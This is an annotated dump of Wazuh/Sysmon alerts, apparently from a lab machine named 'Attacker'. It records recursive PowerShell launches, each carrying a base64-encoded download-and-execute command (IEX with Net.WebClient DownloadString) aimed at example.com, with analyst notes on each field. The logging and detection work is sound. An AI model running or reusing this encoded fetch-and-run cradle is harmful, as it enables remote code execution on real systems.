data.win.eventdata.processGuid: {94294ddc-bd76-680a-890b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 16036 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd72-680a-860b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 15968 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 81 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534330.1719617 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:48.4891010Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284883 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:38:48.448
ProcessGuid: {94294ddc-bd76-680a-890b-000000000e00}
ProcessId: 16036
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_q0avipez.2ek.ps1
CreationUtcTime: 2025-04-24 22:38:48.445
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:48.448 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd76-680a-890b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 16036 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_q0avipez.2ek.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:38:48.445 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 78 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534333.1722386 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:50.8815173Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284919 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:38:49.689
ProcessGuid: {94294ddc-bd79-680a-8b0b-000000000e00}
ProcessId: 3688
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd76-680a-890b-000000000e00}
ParentProcessId: 16036
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:49.689 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd79-680a-8b0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 3688 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd76-680a-890b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 16036 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see high-risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 82 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high-value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534333.1730453 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:51.0649204Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284920 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:38:51.047
ProcessGuid: {94294ddc-bd79-680a-8b0b-000000000e00}
ProcessId: 3688
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_gguk2unw.kfw.ps1
CreationUtcTime: 2025-04-24 22:38:51.047
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:51.047 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd79-680a-8b0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 3688 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_gguk2unw.kfw.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:38:51.047 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see high-risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 79 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high-value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534335.1733218 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:53.6335273Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284943 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:38:52.123
ProcessGuid: {94294ddc-bd7c-680a-8d0b-000000000e00}
ProcessId: 14828
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd79-680a-8b0b-000000000e00}
ParentProcessId: 3688
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:52.123 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd7c-680a-8d0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 14828 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd79-680a-8b0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 3688 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see high-risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
